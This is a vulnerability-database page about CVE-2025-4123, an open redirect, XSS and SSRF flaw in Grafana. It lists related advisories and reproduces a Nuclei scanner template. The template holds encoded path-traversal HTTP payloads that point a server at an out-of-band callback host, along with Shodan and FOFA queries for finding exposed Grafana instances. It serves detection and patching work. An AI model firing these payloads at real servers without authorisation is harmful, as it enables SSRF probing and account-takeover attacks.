| Reporter | Title | Published | Views | Family All 165 |
|---|---|---|---|---|
| grafana -- XSS vulnerability | 26 Apr 202500:00 | – | freebsd | |
| Grafana -- User deletion issue | 15 Apr 202500:00 | – | freebsd | |
| Exploit for Open Redirect in Grafana | 4 Jun 202512:42 | – | githubexploit | |
| Exploit for Open Redirect in Grafana | 22 May 202515:34 | – | githubexploit | |
| Exploit for Open Redirect in Grafana | 6 Jun 202520:24 | – | githubexploit | |
| CVE-2025-4123 | 22 May 202500:00 | – | attackerkb | |
| Alibaba Cloud Linux 3 : 0074: grafana (ALINUX3-SA-2025:0074) | 27 May 202500:00 | – | nessus | |
| AlmaLinux 9 : grafana (ALSA-2025:7893) | 26 May 202500:00 | – | nessus | |
| AlmaLinux 8 : grafana (ALSA-2025:7894) | 20 May 202500:00 | – | nessus | |
| FreeBSD : grafana -- XSS vulnerability (45eb98d6-3b13-11f0-97f7-b42e991fc52e) | 28 May 202500:00 | – | nessus |
id: CVE-2025-4123
info:
name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
impact: |
Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover.
remediation: |
Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
cvss-score: 7.6
cve-id: CVE-2025-4123
cwe-id: CWE-79,CWE-601
epss-score: 0.97809
epss-percentile: 0.99898
reference:
- https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
- https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
metadata:
verified: true
max-request: 1
shodan-query: product:"Grafana"
fofa-query: app="Grafana"
tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln
http:
- raw:
- |
GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
Host: {{Hostname}}
- |
GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: open-redirect
dsl:
- status_code == 302 && contains(location, '/\\oast.pro/?/../../')
- type: dsl
name: ssrf
dsl:
- contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4a0a0047304502203313833f7986238ad2aec14d0fcfb7498465225791f277f44dd6e7992b0ba7b2022100e6e715f0c23353040d3d7d9f85f2b1aa22da99a5e988f3985d4bc806fbdbb9ea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation